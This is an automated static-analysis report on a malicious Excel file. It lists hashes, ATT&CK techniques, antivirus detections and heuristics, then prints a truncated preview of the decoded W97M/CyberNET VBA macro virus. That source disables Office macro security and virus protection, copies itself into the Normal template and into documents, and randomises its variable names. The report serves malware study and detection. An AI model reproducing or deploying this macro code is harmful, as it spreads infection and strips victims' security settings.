Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6525127caa9c42ff…

MALICIOUS

Office (OLE)

36.0 KB Created: 2001-09-06 11:41:48 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 53f2baf50b0c824990b933124ded2419 SHA-1: c608744b134bfde69c0facf1226468ac7b67c63d SHA-256: 6525127caa9c42ffac4de3293438632bc7130ddf9df55b86522c9ac89b019906
400 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1082 System Information Discovery T1204.002 Malicious File

This Excel file contains VBA macros, including Workbook_Open and Document_Open, which are designed to execute automatically. The macros utilize Shell() and CreateObject calls, indicating an intent to run arbitrary code and likely download a secondary payload. The presence of ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cybernet-1' further confirms its malicious nature.

Heuristics 8

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13618 bytes
SHA-256: a6fe075211cde3504cd3d62f713a0f269b92422fb033a02c7a45bc8d395ab6dc
Detection
ClamAV: Doc.Trojan.Cybernet-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
'W97M/CyberNET (C)2000 - Indonesia By AnomOke! "I'm NOT Responsible For Any Damage That Posible Cause By My Virus...!!!"
Application.EnableCancelKey = wdCancelDisabled: Options.SaveInterval = 1: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Application.DisplayRecentFiles = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else: Options.VirusProtection _
= False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: End If
Call HH9466
If Day(Now) = 17 And Month(Now) = 8 Or Day(Now) = 25 And Month(Now) = 12 Then
Randomize: For HK184 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next HK184
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName: Call VC6648: End If
MN5776 = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
RQ8515 = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
If ActiveDocument.VBProject.Description <> "CyberNET" Or Left(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = ActiveDocument.VBProject.VBComponents
Call NV6680(BR4082)
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, RQ8515 - 19))
ActiveDocument.VBProject.Description = "CyberNET"
End If
If NormalTemplate.VBProject.Description <> "CyberNET" Or Left(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = NormalTemplate.VBProject.VBComponents
Call NV6680(BR4082)
Randomize
Dim UR50(1 To 37) As String
UR50(1) = "RP6236"
UR50(2) = "JI3255"
UR50(3) = "FR3570"
UR50(4) = "HH8039"
UR50(5) = "JT9846"
UR50(6) = "MN5776"
UR50(7) = "RQ8515"
UR50(8) = "BR4082"
UR50(9) = "JT8173"
UR50(10) = "LK8445"
UR50(11) = "EE7111"
UR50(12) = "NU6972"
UR50(13) = "HH9466"
UR50(14) = "RK5344"
UR50(15) = "AJ8871"
UR50(16) = "MU2056"
UR50(17) = "QH442"
UR50(18) = "CH2979"
UR50(19) = "AD5532"
UR50(20) = "QF692"
UR50(21) = "NV6680"
UR50(22) = "KE184"
UR50(23) = "GC2158"
UR50(24) = "HK184"
UR50(25) = "CR1726"
UR50(26) = "BG8413"
UR50(27) = "CK5437"
UR50(28) = "NL9381"
UR50(29) = "OL8190"
UR50(30) = "KD1649"
UR50(31) = "BM5181"
UR50(32) = "GN4877"
UR50(33) = "VC6648"
UR50(34) = "IM6298"
UR50(35) = "UV3228"
UR50(36) = "DC5962"
UR50(37) = _
"UR50"
For NU6972 = 1 To 37
JT8173 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JT9846(JT8173, UR50(NU6972))
Next NU6972
ActiveDocument.Saved = True
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, MN5776 - 1) & _
vbCr & "Sub ViewVBCode()" & vbCr & "CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Enabled = False" & vbCr & "End Sub" & vbCr & "Sub ToolsMacro()" _
& vbCr & "Call ViewVBCode" & vbCr & "End Sub" & vbCr & "Sub FileOpen()" & vbCr & "WordBasic.DisableAutoMacros True" & vbCr & "On Error Resume Next" & vbCr & _
"If Dialogs(80).Show <> 0 Then Call Document_Close" & vbCr & "WordBasic.DisableAutoMacros False" & vb
... (truncated)